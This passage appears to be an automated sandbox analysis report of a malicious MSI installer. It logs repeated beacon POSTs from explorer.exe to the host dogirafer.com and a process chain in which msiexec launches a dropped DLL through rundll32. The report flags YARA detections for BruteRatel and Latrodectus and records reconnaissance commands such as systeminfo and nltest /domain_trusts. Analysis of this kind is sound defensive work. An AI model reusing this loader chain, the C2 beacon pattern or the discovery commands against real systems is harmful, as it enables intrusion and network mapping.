2024-12-03 16:46:52 UTC	790	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uX%2BcW0fFz%2F9l5Gt6bJyT%2BNv5hnT%2BMD8Shze1vOqyafHwsd9v3bRDrsVvsY%2F3B6rwjEIVlV6WcKPwMQw7kvVb3vZeSmIC20z2%2FOEjL4eOBBgKN3eB0XBkcI%2FyIefWW1nz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec509027f18727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1824&rtt_var=912&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4202&recv_bytes=1048&delivery_rate=241882&cwnd=230&unsent_bytes=0&cid=0e8c132f85c5e77f&ts=1672&x=0"
2024-12-03 16:46:52 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 79 6d 63 52 73 47 79 32 49 70 6b 5a 68 2f 62 6a 47 2f 6a 67 33 4a 48 50 6b 50 65 42 43 4c 43 61 50 2b 30 75 69 66 4e 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 46 73 4a 55 45 72 66 5a 65 4f 67 56 73 6b 43 62 43 32 74 4f 30 43 73 4a 4b 73 72 63 77 2f 67 69 52 51 48 57 42 4a 37 4d 76 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 73 38 32 41 2b 2f 6d 4a 58 4d 54 5a 62 50 45 65 6e 51 70 71 34 56 50 35 31 66 65 44 42 6f 70 69 30 73 2f 4e 6c 49 49 4e 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4a 62 51 70 Data Ascii: 150OymcRsGy2IpkZh/bjG/jg3JHPkPeBCLCaP+0uifNKRib7xuPoA21j4bUizFsJUErfZeOgVskCbC2tO0CsJKsrcw/giRQHWBJ7MvsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Fs82A+/mJXMTZbPEenQpq4VP51feDBopi0s/NlIINsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfJbQp
2024-12-03 16:46:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50045	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:54 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:55 UTC	787	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwFS8dmAz6BV3JSke79r86TZ1qVfk%2FzQ3afdb6iorjZsBiThJ2oNuzhlDUALntli%2BMk2554Zr1MBNeXSB%2BBComgS2%2BHh4r%2BGxgodDBQLrEqsoAfv15CAP3ssyKJiobVa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec509155da332d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2161&min_rtt=1866&rtt_var=911&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1564844&cwnd=146&unsent_bytes=0&cid=784b2e385fbacf4c&ts=1620&x=0"
2024-12-03 16:46:55 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 53 69 64 54 63 65 78 32 49 70 6e 61 68 6e 64 67 6d 37 6c 67 33 64 4b 50 6b 2f 58 44 53 58 43 5a 76 75 78 76 53 48 4b 59 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 49 6b 34 71 65 4a 50 6b 37 46 6b 71 44 72 65 32 73 71 64 47 74 35 4b 72 6f 38 73 34 67 69 4e 63 47 6d 4a 4f 36 6f 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4c 47 73 77 77 44 65 72 6c 54 68 6f 52 61 37 37 49 66 48 4e 68 34 6f 4e 47 36 56 58 59 43 6e 5a 46 67 45 77 36 4e 46 30 4a 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 50 52 57 52 5a Data Ascii: 150PSidTcex2Ipnahndgm7lg3dKPk/XDSXCZvuxvSHKYWmcphSGpB6yiJiVjA1qIk4qeJPk7FkqDre2sqdGt5Kro8s4giNcGmJO6o+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzLGswwDerlThoRa77IfHNh4oNG6VXYCnZFgEw6NF0JcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOPRWRZ
2024-12-03 16:46:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50046	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:56 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:58 UTC	787	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ul2jivbW43RrWWmPt%2FZ9YHDn9zG5jrZCnTU7lev5zZpCXfW2jK%2BlPbqyYiK2Poi5Ia%2BTvO6YzHKJcrJFzDZqLHuhhRq67K%2FlprWtXRFMSYdJWzNPTcuNIL9PH%2B9s4Xgo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec50927ceb443b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1804&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1613259&cwnd=192&unsent_bytes=0&cid=32eb356067a838e1&ts=1676&x=0"
2024-12-03 16:46:58 UTC	339	IN	Data Raw: 31 34 63 0d 0a 4f 43 32 66 54 4d 62 63 30 4f 46 76 59 42 58 51 79 57 2f 6d 79 6e 4e 4b 50 45 6d 34 42 79 4b 6b 61 50 2b 33 76 47 72 78 58 31 62 64 36 52 61 59 74 41 32 73 30 4d 44 71 74 7a 5a 72 49 55 55 70 46 5a 72 6c 67 46 34 68 44 62 58 7a 73 4b 49 44 73 5a 65 74 70 61 63 38 36 79 5a 58 46 47 4e 49 6f 2f 36 61 56 44 46 73 64 55 46 50 51 56 48 2b 70 59 43 4f 52 6e 33 45 39 6a 30 66 4a 5a 30 4b 34 71 38 38 32 67 32 36 2b 76 37 62 52 69 45 6d 73 56 58 63 49 79 48 47 45 38 77 77 41 34 58 71 49 42 30 5a 62 37 50 48 4e 6e 4d 6c 35 49 35 48 36 31 61 79 43 52 42 47 67 45 67 31 4e 78 63 31 42 4f 6e 69 50 50 6a 56 45 48 69 59 50 6e 61 70 56 6a 65 4a 49 6c 38 58 4e 79 76 34 33 77 39 32 57 66 38 54 69 73 7a 5a 68 61 56 66 4d 34 33 6e 77 63 33 6b 4f 2f 35 56 54 70 Data Ascii: 14cOC2fTMbc0OFvYBXQyW/mynNKPEm4ByKkaP+3vGrxX1bd6RaYtA2s0MDqtzZrIUUpFZrlgF4hDbXzsKIDsZetpac86yZXFGNIo/6aVDFsdUFPQVH+pYCORn3E9j0fJZ0K4q882g26+v7bRiEmsVXcIyHGE8wwA4XqIB0Zb7PHNnMl5I5H61ayCRBGgEg1Nxc1BOniPPjVEHiYPnapVjeJIl8XNyv43w92Wf8TiszZhaVfM43nwc3kO/5VTp
2024-12-03 16:46:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50047	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:47:00 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:47:01 UTC	789	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:47:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iXD%2FL2IKRoz3rQIBmwWZF%2FBuBTfyn%2BKElbZdJi50QcFGqQF%2BQ8JXTsF%2B1eqAbhrESZ8as8NclaS%2BpIKJpXjTAxZ2ClDPNIUxxEHANRA6hG0NAJ3ncVdwCC1iN7rnHHR4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5093acc5a4229-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2347&min_rtt=2345&rtt_var=884&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1235717&cwnd=236&unsent_bytes=0&cid=5561797bb78f436c&ts=1661&x=0"
2024-12-03 16:47:01 UTC	347	IN	Data Raw: 31 35 34 0d 0a 50 69 79 61 52 4d 53 79 30 49 70 6a 61 68 6e 51 68 57 48 6a 67 33 39 4c 4f 55 6e 57 42 53 44 43 61 76 79 79 76 53 54 49 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 49 6b 38 70 66 4a 66 6a 37 46 63 67 44 62 4b 37 74 71 52 47 73 4a 57 6e 70 4d 77 32 35 55 35 54 46 57 56 46 36 4d 57 67 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6f 30 42 4f 6a 72 4a 78 68 2b 5a 4c 44 45 63 33 63 71 37 73 74 45 36 31 54 61 44 78 74 48 37 45 34 34 4e 6c 30 42 50 6f 6e 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 53 51 35 Data Ascii: 154PiyaRMSy0IpjahnQhWHjg39LOUnWBSDCavyyvSTIYGmcphSGpB6yiJiVjA1mIk8pfJfj7FcgDbK7tqRGsJWnpMw25U5TFWVF6MWgfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kco0BOjrJxh+ZLDEc3cq7stE61TaDxtH7E44Nl0BPonMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1SQ5
2024-12-03 16:47:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50048	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:47:03 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:47:04 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:47:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZkOcdlk1L%2FWdc0IAcD0oZWW5i3ruMa2Ix11GjATEI9Ed%2FtdUZLrEvVqVniHdS25FyB7Flq6m85idgInuq48XrLMnY19IbbFnVlhb38TjGXa9YIj4SUwrs9MVsgOTj%2Fm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5094dd9de434b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1636&rtt_var=627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1726788&cwnd=243&unsent_bytes=0&cid=72948ea31d64db2c&ts=1397&x=0"
2024-12-03 16:47:04 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 79 32 56 51 73 57 30 33 49 70 69 59 68 37 62 68 6d 48 67 67 33 4a 49 4f 30 37 54 42 79 62 43 62 50 75 31 75 53 62 4a 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 49 45 51 70 63 70 58 6c 37 46 67 6e 43 37 71 2f 75 61 6c 47 75 35 75 72 72 63 6b 39 35 55 35 57 47 32 42 50 36 38 61 6f 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 34 35 42 2b 72 72 4a 68 35 2b 61 62 4c 49 65 6e 6b 6b 37 73 74 43 35 6c 62 55 41 42 78 45 37 45 34 34 4f 56 34 4c 4f 59 37 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 57 51 70 Data Ascii: 150Py2VQsW03IpiYh7bhmHgg3JIO07TBybCbPu1uSbJZGmcphSGpB6yiJiVjA1pIEQpcpXl7FgnC7q/ualGu5urrck95U5WG2BP68aofW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc45B+rrJh5+abLIenkk7stC5lbUABxE7E44OV4LOY7MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1WQp
2024-12-03 16:47:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50049	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:47:05 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:47:07 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:47:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ohoS9oIvL6r%2FuA1Bz5F5D9DVQgcyoQK%2F%2BIyHB5Us5zOFhlE1s5pQT5pxnK8%2BUjvflSuyrsnr9NcefauZXMR2Qp8aunox521DyhGDFFiaef4gJVO6OM52RVjWId2UYGf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec509603d5143d5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1769&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1593016&cwnd=240&unsent_bytes=0&cid=b0c34d83a8cfd11a&ts=1624&x=0"
2024-12-03 16:47:07 UTC	347	IN	Data Raw: 31 35 34 0d 0a 4f 53 69 59 51 4d 61 32 32 49 70 67 5a 68 6e 63 68 57 48 6f 67 33 35 50 4f 6b 72 51 41 43 48 43 62 76 65 78 76 79 62 4d 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 4a 45 4d 75 63 70 50 6b 37 46 63 6d 44 62 71 2b 74 61 68 47 75 70 43 6f 6f 38 45 37 37 55 35 58 47 32 70 4e 35 38 4f 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 78 41 65 37 72 49 42 68 2b 61 72 4c 48 66 6e 51 70 37 38 74 45 35 31 4c 65 44 78 35 44 37 45 73 31 4e 6c 34 49 4f 59 72 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 51 51 35 Data Ascii: 154OSiYQMa22IpgZhnchWHog35POkrQACHCbvexvybMZGmcphSGpB6yiJiVjA1mJEMucpPk7FcmDbq+tahGupCoo8E77U5XG2pN58OnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwxAe7rIBh+arLHfnQp78tE51LeDx5D7Es1Nl4IOYrMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1QQ5
2024-12-03 16:47:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:42:59
Start date:	03/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fes.msi"
Imagebase:	0x7ff783690000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:42:59
Start date:	03/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff783690000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	11:42:59
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 499D87EFF8C8F588A32BFEB435A5201B
Imagebase:	0x360000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:43:00
Start date:	03/12/2024
Path:	C:\Windows\Installer\MSI17D3.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
Imagebase:	0xcb0000
File size:	399'328 bytes
MD5 hash:	B9545ED17695A32FACE8C3408A6A3553
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:43:00
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
Imagebase:	0xd20000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	11:43:00
Start date:	03/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
Imagebase:	0x7ff673020000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000003.2823468675.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000003.2823307275.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000003.1919345922.000001E51D085000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000002.4141158202.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	11:43:24
Start date:	03/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000002.4152487268.000000000B3AA000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	11:45:02
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c ipconfig /all
Imagebase:	0x7ff693270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:45:02
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:45:02
Start date:	03/12/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /all
Imagebase:	0x7ff6e7b30000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:45:02
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c systeminfo
Imagebase:	0x7ff693270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:45:02
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:45:02
Start date:	03/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff7d3060000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:45:03
Start date:	03/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:45:03
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts
Imagebase:	0x7ff693270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:45:03
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:45:03
Start date:	03/12/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts
Imagebase:	0x7ff7b5590000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:45:04
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts /all_trusts
Imagebase:	0x7ff693270000
File size:	289'792 bytes
